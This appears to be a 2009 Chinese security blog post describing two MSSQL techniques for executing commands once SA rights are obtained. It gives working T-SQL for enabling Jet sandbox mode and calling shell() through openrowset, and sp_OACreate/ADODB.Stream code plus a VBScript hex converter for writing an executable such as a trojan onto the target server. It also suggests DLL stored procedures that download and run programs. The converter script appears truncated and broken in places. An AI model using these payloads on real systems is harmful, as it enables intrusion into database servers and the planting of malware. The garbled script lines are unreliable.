MSSQL中两种特别的执行命令的方法

  • A+
所属分类:lcx

    By:Setheo

    Date:2009-12-15 21:12

    以下方法可能带有攻击性,请各位同学不要用于入侵。另,感谢高兴先生提供思路。

    以下方法都以需要SA权限为前提。

1、沙盒模式的变通。

    原始方法:

    第一句开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftJet4.0Engines','SandBoxMode','REG_DWORD',1

    第二句利用jet.oledb执行系统命令:

select * from openrowset('microsoft.jet.oledb.4.0',';database=iasdnary.mdb','select shell("CMD命令")')

    或

select * from openrowset('microsoft.jet.oledb.4.0',';database=iasias.mdb','select shell("CMD命令")')

    但是,当 X:WindowsSystem32iasdnary.mdb 或 X:WindowsSystem32iasias.mdb 被删除时,命令就会无效了。

    所以利用以下语句创建一个数据库:(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用。)

declare @hr int
declare @object int;declare @property int
exec @hr = sp_OACreate 'ADOX.Catalog',@object OUTPUT
exec @hr = sp_OAMethod @object,'Create',@property output,'Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml'

    然后再利用jet.oledb调用SysSetup.xml执行系统命令:

select * from openrowset('microsoft.jet.oledb.4.0',';database=SysSetup.xml','select shell("CMD命令")')

2、直接写入文件到对方计算机。

    此处的文件可以是exe、dll等。(注:此方法不支持文件大于64KB)

    当已经有一个程序需要放到对方计算机的时候。(例如,放MA。)

    将这个文件转成HEX代码。如果不知道怎么把文件转成HEX代码,请使用下面的工具(File2Hex.vbs)。

File2Hex.vbs:

    On Error Resume Next
    FilePath = Wscript.Arguments(0)
    FieName = Right(FilePath, Len(FilePath) - InStrRev(FilePath, ""))
    With CreateObject("Adodb.Stream")
        .Type = 1: .open: .loadfromfile FilePath: Str = .read: Sl = LenB(Str)
    End With
    
    Sll = Sl Mod 65536: Slh = Sl  65536
    With CreateObject("Scripting.FileSystemObject").OpenTextFile(FilePath & ".txt", 2, True)
        .Write "0x"
        For i = 1 To Sl
            bt = AscB(MidB(Str, i, 1))
            If bt 
            .Write Hex(bt)
        Next
    End With

    使用方法很简单,把要转的文件拖到脚本上去,就会生成包含HEX代码的文本。

    然后用以下方法写入到对方计算机中。

DECLARE @ObjectToken INT
EXEC sp_OACreate 'ADODB.Stream', @ObjectToken OUTPUT
EXEC sp_OASetProperty @ObjectToken, 'Type', 1
EXEC sp_OAMethod @ObjectToken, 'Open'
EXEC sp_OAMethod @ObjectToken, 'Write', NULL, 0x123456(其中0x123456为HEX内容)

EXEC sp_OAMethod @ObjectToken, 'SaveToFile', NULL, 'Test.exe(文件名)', 2
EXEC sp_OAMethod @ObjectToken, 'Close'
EXEC sp_OADestroy @ObjectToken

    写入之后,就发挥你的办法去执行你写入的这个文件就OK了。

集思广益:

    现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限。

    所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程。

    至于存储过程的功能,可以是下载程序并执行,可以是直接执行命令,当然这个看你自己了。

文章来源于lcx.cc:MSSQL中两种特别的执行命令的方法

相关推荐: 针对目标站点渗透测试方法的总结

针对目标站点进行渗透测试的方法,目标:取得目标的操作系统控制权限(Windows:administrator、Linux:root) 伙伴们过来补充一下你们经常使用的其它方法吧!顺便纠正本文里面的错误。仅谈Web层面的哦,至于21、22、3306、1433、3…

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: